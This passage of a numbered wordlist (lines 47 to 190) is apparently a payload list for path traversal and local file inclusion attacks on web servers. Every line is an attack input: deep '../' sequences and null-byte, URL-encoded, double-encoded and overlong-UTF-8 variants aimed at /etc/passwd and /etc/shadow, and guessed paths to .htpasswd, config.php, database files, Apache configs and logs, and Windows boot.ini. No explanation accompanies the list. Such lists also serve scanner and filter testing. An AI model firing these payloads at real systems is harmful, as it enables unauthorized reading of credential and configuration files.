../../../../../../../../../../../../../../../../../../../../etc/passwd%00 47 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd 48 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 49 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd 50 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 51 | ../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 52 | ../../../../../../etc/passwd&=%3C%3C%3C%3C 53 | ../../../administrator/inbox 54 | ../../../../../../../dev 55 | .htpasswd 56 | passwd 57 | passwd.dat 58 | pass.dat 59 | .htpasswd 60 | /.htpasswd 61 | ../.htpasswd 62 | .passwd 63 | /.passwd 64 | ../.passwd 65 | .pass 66 | ../.pass 67 | members/.htpasswd 68 | member/.htpasswd 69 | user/.htpasswd 70 | users/.htpasswd 71 | root/.htpasswd 72 | db.php 73 | data.php 74 | database.asp 75 | database.js 76 | database.php 77 | dbase.php a 78 | admin/access_log 79 | ../users.db.php 80 | users.db.php 81 | /core/config.php 82 | config.php 83 | config.js 84 | ../config.js 85 | config.asp 86 | ../config.asp 87 | _config.php 88 | ../_config.php 89 | ../_config.php%00 90 | ../config.php 91 | config.inc.php 92 | ../config.inc.php 93 | /config.asp 94 | ../config.asp 95 | /../../../../pswd 96 | /admin/install.php 97 | ../install.php 98 | install.php 99 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 100 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow 101 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd 102 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow 103 | ..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed 104 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini 105 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 106 | /..\..\..\..\..\..\winnt\win.ini 107 | ../../windows/win.ini 108 | ..//..//..//..//..//boot.ini 109 | ..\../..\../boot.ini 110 | ..\../..\../..\../..\../boot.ini 111 | \…..\\\…..\\\…..\\\ 112 | =3D “/..” . “%2f.. 113 | d:\AppServ\MySQL 114 | c:\AppServ\MySQL 115 | c:WINDOWS/system32/ 116 | /C:\Program Files\ 117 | /D:\Program Files\ 118 | /C:/inetpub/ftproot/ 119 | /boot/grub/grub.conf 120 | /proc/interrupts 121 | /proc/cpuinfo 122 | /proc/meminfo 123 | ../apache/logs/error.log 124 | ../apache/logs/access.log 125 | ../../apache/logs/error.log 126 | ../../apache/logs/access.log 127 | ../../../apache/logs/error.log 128 | ../../../apache/logs/access.log 129 | ../../../../../../../etc/httpd/logs/acces_log 130 | ../../../../../../../etc/httpd/logs/acces.log 131 | ../../../../../../../etc/httpd/logs/error_log 132 | ../../../../../../../etc/httpd/logs/error.log 133 | ../../../../../../../var/www/logs/access_log 134 | ../../../../../../../var/www/logs/access.log 135 | ../../../../../../../usr/local/apache/logs/access_ log 136 | ../../../../../../../usr/local/apache/logs/access. log 137 | ../../../../../../../var/log/apache/access_log 138 | ../../../../../../../var/log/apache2/access_log 139 | ../../../../../../../var/log/apache/access.log 140 | ../../../../../../../var/log/apache2/access.log 141 | ../../../../../../../var/log/access_log 142 | ../../../../../../../var/log/access.log 143 | ../../../../../../../var/www/logs/error_log 144 | ../../../../../../../var/www/logs/error.log 145 | ../../../../../../../usr/local/apache/logs/error_l og 146 | ../../../../../../../usr/local/apache/logs/error.l og 147 | ../../../../../../../var/log/apache/error_log 148 | ../../../../../../../var/log/apache2/error_log 149 | ../../../../../../../var/log/apache/error.log 150 | ../../../../../../../var/log/apache2/error.log 151 | ../../../../../../../var/log/error_log 152 | ../../../../../../../var/log/error.log 153 | /etc/init.d/apache 154 | /etc/init.d/apache2 155 | /etc/httpd/httpd.conf 156 | /etc/apache/apache.conf 157 | /etc/apache/httpd.conf 158 | /etc/apache2/apache2.conf 159 | /etc/apache2/httpd.conf 160 | /usr/local/apache2/conf/httpd.conf 161 | /usr/local/apache/conf/httpd.conf 162 | /opt/apache/conf/httpd.conf 163 | /home/apache/httpd.conf 164 | /home/apache/conf/httpd.conf 165 | /etc/apache2/sites-available/default 166 | /etc/apache2/vhosts.d/default_vhost.include 167 | /etc/passwd 168 | /etc/shadow 169 | /etc/group 170 | /etc/security/group 171 | /etc/security/passwd 172 | /etc/security/user 173 | /etc/security/environ 174 | /etc/security/limits 175 | /usr/lib/security/mkuser.default/etc/master.passwd 176 | ....//....//....//etc/passwd 177 | ....\/....\/....\/etc/passwd 178 | %5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd 179 | ..%252f..%252f..%252fetc%252fpasswd 180 | ..%c0%af..%c0%af..%c0%afetc%c0%afpasswd 181 | %252e%252e%252fetc%252fpasswd 182 | %252e%252e%252fetc%252fpasswd%00 183 | ....//....//etc/passwd 184 | ..///////..////..//////etc/passwd 185 | /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd 186 | /var/www/../../etc/passwd 187 | %25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66etc/passwd 188 | ../../../etc/passwd%00.jpg 189 | ....//....//....//etc/passwd 190 | --------------------------------------------------------------------------------